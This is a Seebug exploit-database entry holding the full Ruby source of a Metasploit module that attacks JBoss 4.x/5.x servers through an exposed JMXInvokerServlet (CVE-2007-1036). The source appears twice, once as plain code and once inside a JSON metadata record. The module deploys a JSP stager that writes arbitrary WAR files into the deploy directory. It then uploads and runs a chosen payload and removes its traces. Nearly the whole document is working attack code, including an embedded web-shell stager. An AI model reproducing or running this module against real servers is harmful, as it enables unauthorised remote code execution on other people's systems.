ID SSV:74923
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /JBoss/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',
'Description' => %q{
This module can be used to execute a payload on JBoss servers that have an
exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking
the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed
to finally upload the selected payload to the target. The DeploymentFileRepository
methods are only available on Jboss 4.x and 5.x.
},
'Author' => [
'Patrick Hof', # Vulnerability discovery, analysis and PoC
'Jens Liebchen', # Vulnerability discovery, analysis and PoC
'h0ng10' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-1036' ],
[ 'OSVDB', '33744' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
],
'DisclosureDate' => 'Feb 20 2007',
'Privileged' => true,
'Platform' => ['java', 'win', 'linux' ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
# do target detection but java meter by default
[ 'Automatic',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
],
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
},
],
#
# Platform specific targets
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
OptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),
], self.class)
end
def check
res = send_serialized_request('version.bin')
if (res.nil?) or (res.code != 200)
print_error("Unable to request version, returned http code is: #{res.code.to_s}")
return Exploit::CheckCode::Unknown
end
# Check if the version is supported by this exploit
return Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/
return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/
return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/
if res.body =~ /ServletException/ # Simple check, if we caused an exception.
print_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target
fail_with("Unable to automatically select a target") if not mytarget
print_status("Automatically selected target: \"#{mytarget.name}\"")
else
print_status("Using manually select target: \"#{mytarget.name}\"")
end
# We use a already serialized stager to deploy the final payload
regex_stager_app_base = rand_text_alpha(14)
regex_stager_jsp_name = rand_text_alpha(14)
name_parameter = rand_text_alpha(8)
content_parameter = rand_text_alpha(8)
stager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp"
stager_code = "A" * 810 # 810 is the size of the stager in the serialized request
replace_values = {
'regex_app_base' => regex_stager_app_base,
'regex_jsp_name' => regex_stager_jsp_name,
stager_code => generate_stager(name_parameter, content_parameter)
}
print_status("Deploying stager")
send_serialized_request('installstager.bin', replace_values)
print_status("Calling stager: #{stager_uri}")
call_uri_mtimes(stager_uri, 5, 'GET')
# Generate the WAR with the payload which will be uploaded through the stager
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
war_data = payload.encoded_war({
:app_name => app_base,
:jsp_name => jsp_name,
:arch => mytarget.arch,
:platform => mytarget.platform
}).to_s
b64_war = Rex::Text.encode_base64(war_data)
print_status("Uploading payload through stager")
res = send_request_cgi({
'uri' => stager_uri,
'method' => "POST",
'vars_post' =>
{
name_parameter => app_base,
content_parameter => b64_war
}
}, 20)
payload_uri = "/#{app_base}/#{jsp_name}.jsp"
print_status("Calling payload: " + payload_uri)
res = call_uri_mtimes(payload_uri,5, 'GET')
# Remove the payload through stager
print_status("Removing payload through stager")
delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
res = send_request_cgi(
{'uri' => delete_payload_uri,
})
# Remove the stager
print_status("Removing stager")
send_serialized_request('removestagerfile.bin', replace_values)
send_serialized_request('removestagerdirectory.bin', replace_values)
handler
end
def generate_stager(name_param, content_param)
war_file = rand_text_alpha(4+rand(4))
file_content = rand_text_alpha(4+rand(4))
jboss_home = rand_text_alpha(4+rand(4))
decoded_content = rand_text_alpha(4+rand(4))
path = rand_text_alpha(4+rand(4))
fos = rand_text_alpha(4+rand(4))
name = rand_text_alpha(4+rand(4))
file = rand_text_alpha(4+rand(4))
stager_script = <<-EOT
<%@page import="java.io.*,
java.util.*,
sun.misc.BASE64Decoder"
%>
<%
String #{file_content} = "";
String #{war_file} = "";
String #{jboss_home} = System.getProperty("jboss.server.home.dir");
if (request.getParameter("#{content_param}") != null){
try {
#{file_content} = request.getParameter("#{content_param}");
#{war_file} = request.getParameter("#{name_param}");
byte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});
String #{path} = #{jboss_home} + "/deploy/" + #{war_file} + ".war";
FileOutputStream #{fos} = new FileOutputStream(#{path});
#{fos}.write(#{decoded_content});
#{fos}.close();
}
catch(Exception e) {}
}
else {
try{
String #{name} = request.getParameter("#{name_param}");
String #{file} = #{jboss_home} + "/deploy/" + #{name} + ".war";
new File(#{file}).delete();
}
catch(Exception e) {}
}
%>
EOT
# The script must be exactly 810 characters long, otherwise we might have serialization issues
# Therefore we fill the rest wit spaces
spaces = " " * (810 - stager_script.length)
stager_script << spaces
end
def send_serialized_request(file_name , replace_params = {})
path = File.join( Msf::Config.install_root, "data", "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)
data = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }
replace_params.each { |key, value| data.gsub!(key, value) }
res = send_request_cgi({
'uri' => target_uri.path,
'method' => 'POST',
'data' => data,
'headers' =>
{
'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',
'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'
}
}, 25)
if (not res) or (res.code != 200)
print_error("Failed: Error requesting preserialized request #{file_name}")
return nil
end
res
end
def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)
# JBoss might need some time for the deployment. Try 5 times at most and
# wait 5 seconds inbetween tries
num_attempts.times do |attempt|
if (verb == "POST")
res = send_request_cgi(
{
'uri' => uri,
'method' => verb,
'data' => data
}, 5)
else
uri += "?#{data}" unless data.nil?
res = send_request_cgi(
{
'uri' => uri,
'method' => verb
}, 30)
end
msg = nil
if (!res)
msg = "Execution failed on #{uri} [No Response]"
elsif (res.code < 200 or res.code >= 300)
msg = "http request failed to #{uri} [#{res.code}]"
elsif (res.code == 200)
print_status("Successfully called '#{uri}'") if datastore['VERBOSE']
return res
end
if (attempt < num_attempts - 1)
msg << ", retrying in 5 seconds..."
print_status(msg) if datastore['VERBOSE']
select(nil, nil, nil, 5)
else
print_error(msg)
return res
end
end
end
def auto_target
print_status("Attempting to automatically select a target")
plat = detect_platform()
arch = detect_architecture()
return nil if (not arch or not plat)
# see if we have a match
targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
# no matching target found
return nil
end
# Try to autodetect the target platform
def detect_platform
print_status("Attempting to automatically detect the platform")
res = send_serialized_request("osname.bin")
if (res.body =~ /(Linux|FreeBSD|Windows)/i)
os = $1
if (os =~ /Linux/i)
return 'linux'
elsif (os =~ /FreeBSD/i)
return 'linux'
elsif (os =~ /Windows/i)
return 'win'
end
end
nil
end
# Try to autodetect the architecture
def detect_architecture()
print_status("Attempting to automatically detect the architecture")
res = send_serialized_request("osarch.bin")
if (res.body =~ /(i386|x86)/i)
arch = $1
if (arch =~ /i386|x86/i)
return ARCH_X86
# TODO, more
end
end
nil
end
end
{"lastseen": "2017-11-19T16:09:24", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "dsquare", "idList": ["E-62"]}]}, "exploitation": null, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-74923", "references": [], "enchantments_done": [], "id": "SSV:74923", "title": "JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n require 'msf/core'\r\n\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /JBoss/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module can be used to execute a payload on JBoss servers that have an\r\n\t\t\t\texposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking\r\n\t\t\t\tthe methods provided by jboss.admin:DeploymentFileRepository a stager is deployed\r\n\t\t\t\tto finally upload the selected payload to the target. The DeploymentFileRepository\r\n\t\t\t\tmethods are only available on Jboss 4.x and 5.x.\r\n\t\t\t},\r\n\t\t\t'Author' => [\r\n\t\t\t\t'Patrick Hof', # Vulnerability discovery, analysis and PoC\r\n\t\t\t\t'Jens Liebchen', # Vulnerability discovery, analysis and PoC\r\n\t\t\t\t'h0ng10' # Metasploit module\r\n\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-1036' ],\r\n\t\t\t\t\t[ 'OSVDB', '33744' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 20 2007',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => ['java', 'win', 'linux' ],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Aggressive,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t# do target detection but java meter by default\r\n\t\t\t\t\t[ 'Automatic',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t\t'Platform' => 'java'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Java Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Platform specific targets\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Linux x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux'\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(8080),\r\n\t\t\t\t\tOptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),\r\n\t\t\t\t\tOptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),\r\n\t\t\t\t\tOptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),\r\n\t\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_serialized_request('version.bin')\r\n\t\tif (res.nil?) or (res.code != 200)\r\n\t\t\tprint_error("Unable to request version, returned http code is: #{res.code.to_s}")\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\t# Check if the version is supported by this exploit\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/\r\n\r\n\t\tif res.body =~ /ServletException/\t# Simple check, if we caused an exception.\r\n\t\t\tprint_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")\r\n\t\t\treturn Exploit::CheckCode::Appears\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tmytarget = target\r\n\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tmytarget = auto_target\r\n\t\t\tfail_with("Unable to automatically select a target") if not mytarget\r\n\t\t\tprint_status("Automatically selected target: \\"#{mytarget.name}\\"")\r\n\t\telse\r\n\t\t\tprint_status("Using manually select target: \\"#{mytarget.name}\\"")\r\n\t\tend\r\n\r\n\r\n\t\t# We use a already serialized stager to deploy the final payload\r\n\t\tregex_stager_app_base = rand_text_alpha(14)\r\n\t\tregex_stager_jsp_name = rand_text_alpha(14)\r\n\t\tname_parameter = rand_text_alpha(8)\r\n\t\tcontent_parameter = rand_text_alpha(8)\r\n\t\tstager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp"\r\n\t\tstager_code = "A" * 810\t\t# 810 is the size of the stager in the serialized request\r\n\r\n\t\treplace_values = {\r\n\t\t\t'regex_app_base' => regex_stager_app_base,\r\n\t\t\t'regex_jsp_name' => regex_stager_jsp_name,\r\n\t\t\tstager_code => generate_stager(name_parameter, content_parameter)\r\n\t\t}\r\n\r\n\t\tprint_status("Deploying stager")\r\n\t\tsend_serialized_request('installstager.bin', replace_values)\r\n\t\tprint_status("Calling stager: #{stager_uri}")\r\n\t\tcall_uri_mtimes(stager_uri, 5, 'GET')\r\n\r\n\t\t# Generate the WAR with the payload which will be uploaded through the stager\r\n\t\tapp_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))\r\n\t\tjsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))\r\n\r\n\t\twar_data = payload.encoded_war({\r\n\t\t\t:app_name => app_base,\r\n\t\t\t:jsp_name => jsp_name,\r\n\t\t\t:arch => mytarget.arch,\r\n\t\t\t:platform => mytarget.platform\r\n\t\t}).to_s\r\n\r\n\t\tb64_war = Rex::Text.encode_base64(war_data)\r\n\t\tprint_status("Uploading payload through stager")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => stager_uri,\r\n\t\t\t'method' => "POST",\r\n\t\t\t'vars_post' =>\r\n\t\t\t{\r\n\t\t\t\tname_parameter => app_base,\r\n\t\t\t\tcontent_parameter => b64_war\r\n\t\t\t}\r\n\t\t}, 20)\r\n\r\n\t\tpayload_uri = "/#{app_base}/#{jsp_name}.jsp"\r\n\t\tprint_status("Calling payload: " + payload_uri)\r\n\t\tres = call_uri_mtimes(payload_uri,5, 'GET')\r\n\r\n\t\t# Remove the payload through stager\r\n\t\tprint_status("Removing payload through stager")\r\n\t\tdelete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"\r\n\t\tres = send_request_cgi(\r\n\t\t\t{'uri' => delete_payload_uri,\r\n\t\t})\r\n\r\n\t\t# Remove the stager\r\n\t\tprint_status("Removing stager")\r\n\t\tsend_serialized_request('removestagerfile.bin', replace_values)\r\n\t\tsend_serialized_request('removestagerdirectory.bin', replace_values)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef generate_stager(name_param, content_param)\r\n\t\twar_file = rand_text_alpha(4+rand(4))\r\n\t\tfile_content = rand_text_alpha(4+rand(4))\r\n\t\tjboss_home = rand_text_alpha(4+rand(4))\r\n\t\tdecoded_content = rand_text_alpha(4+rand(4))\r\n\t\tpath = rand_text_alpha(4+rand(4))\r\n\t\tfos = rand_text_alpha(4+rand(4))\r\n\t\tname = rand_text_alpha(4+rand(4))\r\n\t\tfile = rand_text_alpha(4+rand(4))\r\n\r\n\t\tstager_script = <<-EOT\r\n<%@page import="java.io.*,\r\n\t\tjava.util.*,\r\n\t\tsun.misc.BASE64Decoder"\r\n%>\r\n<%\r\nString #{file_content} = "";\r\nString #{war_file} = "";\r\nString #{jboss_home} = System.getProperty("jboss.server.home.dir");\r\nif (request.getParameter("#{content_param}") != null){\r\ntry {\r\n#{file_content} = request.getParameter("#{content_param}");\r\n#{war_file} = request.getParameter("#{name_param}");\r\nbyte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});\r\nString #{path} = #{jboss_home} + "/deploy/" + #{war_file} + ".war";\r\nFileOutputStream #{fos} = new FileOutputStream(#{path});\r\n#{fos}.write(#{decoded_content});\r\n#{fos}.close();\r\n}\r\ncatch(Exception e) {}\r\n}\r\nelse {\r\ntry{\r\nString #{name} = request.getParameter("#{name_param}");\r\nString #{file} = #{jboss_home} + "/deploy/" + #{name} + ".war";\r\nnew File(#{file}).delete();\r\n}\r\ncatch(Exception e) {}\r\n}\r\n\r\n%>\r\nEOT\r\n\r\n\t# The script must be exactly 810 characters long, otherwise we might have serialization issues\r\n\t# Therefore we fill the rest wit spaces\r\n\tspaces = " " * (810 - stager_script.length)\r\n\tstager_script << spaces\r\n\tend\r\n\r\n\r\n\tdef send_serialized_request(file_name , replace_params = {})\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)\r\n\t\tdata = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }\r\n\r\n\t\treplace_params.each { |key, value| data.gsub!(key, value) }\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => target_uri.path,\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'data' => data,\r\n\t\t\t'headers' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',\r\n\t\t\t\t\t'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'\r\n\t\t\t\t}\r\n\t\t}, 25)\r\n\r\n\r\n\t\tif (not res) or (res.code != 200)\r\n\t\t\tprint_error("Failed: Error requesting preserialized request #{file_name}")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tres\r\n\tend\r\n\r\n\r\n\tdef call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)\r\n\t\t# JBoss might need some time for the deployment. Try 5 times at most and\r\n\t\t# wait 5 seconds inbetween tries\r\n\t\tnum_attempts.times do |attempt|\r\n\t\t\tif (verb == "POST")\r\n\t\t\t\tres = send_request_cgi(\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'uri' => uri,\r\n\t\t\t\t\t\t'method' => verb,\r\n\t\t\t\t\t\t'data' => data\r\n\t\t\t\t\t}, 5)\r\n\t\t\telse\r\n\t\t\t\turi += "?#{data}" unless data.nil?\r\n\t\t\t\tres = send_request_cgi(\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'uri' => uri,\r\n\t\t\t\t\t\t'method' => verb\r\n\t\t\t\t\t}, 30)\r\n\t\t\tend\r\n\r\n\t\t\tmsg = nil\r\n\t\t\tif (!res)\r\n\t\t\t\tmsg = "Execution failed on #{uri} [No Response]"\r\n\t\t\telsif (res.code < 200 or res.code >= 300)\r\n\t\t\t\tmsg = "http request failed to #{uri} [#{res.code}]"\r\n\t\t\telsif (res.code == 200)\r\n\t\t\t\tprint_status("Successfully called '#{uri}'") if datastore['VERBOSE']\r\n\t\t\t\treturn res\r\n\t\t\tend\r\n\r\n\t\t\tif (attempt < num_attempts - 1)\r\n\t\t\t\tmsg << ", retrying in 5 seconds..."\r\n\t\t\t\tprint_status(msg) if datastore['VERBOSE']\r\n\t\t\t\tselect(nil, nil, nil, 5)\r\n\t\t\telse\r\n\t\t\t\tprint_error(msg)\r\n\t\t\t\treturn res\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\r\n\r\n\tdef auto_target\r\n\t\tprint_status("Attempting to automatically select a target")\r\n\r\n\t\tplat = detect_platform()\r\n\t\tarch = detect_architecture()\r\n\r\n\t\treturn nil if (not arch or not plat)\r\n\r\n\t\t# see if we have a match\r\n\t\ttargets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }\r\n\r\n\t\t# no matching target found\r\n\t\treturn nil\r\n\tend\r\n\r\n\r\n\t# Try to autodetect the target platform\r\n\tdef detect_platform\r\n\t\tprint_status("Attempting to automatically detect the platform")\r\n\t\tres = send_serialized_request("osname.bin")\r\n\r\n\t\tif (res.body =~ /(Linux|FreeBSD|Windows)/i)\r\n\t\t\tos = $1\r\n\t\t\tif (os =~ /Linux/i)\r\n\t\t\t\treturn 'linux'\r\n\t\t\telsif (os =~ /FreeBSD/i)\r\n\t\t\t\treturn 'linux'\r\n\t\t\telsif (os =~ /Windows/i)\r\n\t\t\t\treturn 'win'\r\n\t\t\tend\r\n\t\tend\r\n\t\tnil\r\n\tend\r\n\r\n\r\n\t# Try to autodetect the architecture\r\n\tdef detect_architecture()\r\n\t\tprint_status("Attempting to automatically detect the architecture")\r\n\t\tres = send_serialized_request("osarch.bin")\r\n\t\tif (res.body =~ /(i386|x86)/i)\r\n\t\t\tarch = $1\r\n\t\t\tif (arch =~ /i386|x86/i)\r\n\t\t\t\treturn ARCH_X86\r\n\t\t\t\t# TODO, more\r\n\t\t\tend\r\n\t\tend\r\n\t\tnil\r\n\tend\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-74923", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645253958}}
{}
